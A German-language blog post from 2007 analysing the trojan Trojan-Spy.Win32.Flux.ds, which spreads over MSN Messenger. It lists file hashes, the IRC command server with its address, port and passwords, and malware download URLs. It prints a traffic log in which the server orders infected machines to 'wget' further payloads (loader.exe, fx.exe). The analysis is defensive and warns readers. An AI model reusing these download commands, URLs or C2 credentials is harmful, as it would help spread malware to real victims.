Ananyse von Trojan-Spy.Win32.Flux.ds

Published on December 14, 2007 in Malware & Virus Analysing. 0 Comments Tags: , , , .

Zur Zeit ist wieder einmal ein Virus im Umlauf, welcher sich per MSN-Messenger weiterverbreitet.
Aufmerksam auf den Virus wurde ich durch folgende Nachricht:

*****@hotmail.com sagte:
Hey here are some new pics for ya!
image105.zip

Das ZIP-Archiv image105.zip enthält die Datei image105.jpg-www.photoalbums.com:

Filename: image105.jpg-www.photoalbums.com
File size: 132096 bytes
MD5: 62366a65926f155ea9dfe82f94743091
SHA1: 2230632c09df917b2d9cf520b2eeff57bb70f35d

Die Datei ist mit dem Virus Trojan-Spy.Win32.Flux.ds infiziert (F-Secure, Kaspersky, VBA32)

Kontaktierte Server
server11.core.net Port 9058 (147.202.32.83 – IRC Server)
www.rhythmswing.org/includes/cgi1.txt (Text File)
www.studiegroepmetselen.nl/components/com_sef/in4.exe (Trojan-Spy.Win32.Flux.ds)
www.netau.dk/dir/loader.exe (BackDoor.Bulknet.110)
www.netau.dk/dir/fx.exe (Trojan:Win32/VNCKill.A)

Verhalten
Nach ausführen der Datei Meldet sich der infizierte Rechner an einem IRC-Server (C&C Server) an:

Hostname: server11.core.net
IP-Adresse: 147.202.32.83
Port: 9058
Passwort: gsaxx00
IP-Block Owner: Team Technologies USA (147.202.0.0/16)

Die Kommunikation läuft dabei wie folgt ab:

Victim -> 147.202.32.83:9058 CONNECT
Victim -> 147.202.32.83 PASS gsaxx00
Victim <- 147.202.32.83 OK
Victim -> 147.202.32.83 NICK \00\CHE\diwfarqfr9
Victim -> 147.202.32.83 USER XP-SP2 x x :WIN_XP
Victim <- 147.202.32.83 VERSION Request
Victim -> 147.202.32.83 VERSION Reply
Victim -> 147.202.32.83 JOIN ##pool P00L
Victim<- 147.202.32.83 * msn.url http://www.rhythmswing.org/includes/cgi1.txt http://www.studiegroepmetselen.nl/components/com_sef/in4.exe image105.jpg-www.photoalbums.com image105.zip 30 40
Victim <- 147.202.32.83 *** You were forced to join ##in
Victim <- 147.202.32.83 main.wget http://www.netau.dk/dir/loader.exe
Victim <- 147.202.32.83 *** You were forced to join ##in2
Victim <- 147.202.32.83 main.wget http://www.netau.dk/dir/fx.exe

Der Rechner Verbindet sich mit dem Server auf Port 9058 mit dem passwort gsaxx00 und einem entsprechendem Nick und USER-ID. Danach Fragt der Remote Server die Version des Clients ab (somit kommt man mit einem normalen IRC Client wie z.B. mIRC nicht auf den Chat-Server!). Wenn die Version Antwort richtig ist, betritt der Rechner den Channel “#pool” mit dem Channel Passwort “P00L”.
Nachdem der Rechner den Channel Betreten hat, macht der Infizierte Rechner folgendes:

Er holt das neuste infizierte exe File vom Server (http://www.studiegroepmetselen.nl/components/com_sef/in4.exe), benennt dieses File in image105.jpg-www.photoalbums.com um, ZIPT das File und sendet es an alle Messenger Kontakte weiter, die er in der Date msn.url auf dem Rechner finden kann. Als Text verwendet er die Vorlage aus dem Text File von http://www.rhythmswing.org/includes/cgi1.txt

Danach wird der Rechner gezwungen, weiteren Channels (#in und #in2) zu betreten. Dort bekommt er die Anweisung weitere Schadsoftware von http://www.netau.dk/dir/loader.exe und http://www.netau.dk/dir/fx.exe nachzuladen. Diese zwei Dateien enthalten ein Spam Modul, wonach der Infizierte Rechner in einen Spam-Zombie mutiert.

Seit also vorsichtig, bevor Ihr ein Zip oder Exe File im MSN akzeptiert.

0 Responses to “Ananyse von Trojan-Spy.Win32.Flux.ds”

Feed for this Entry Trackback Address
  • No Comments

Leave a Reply
economics-recluse
Scene
Urgent!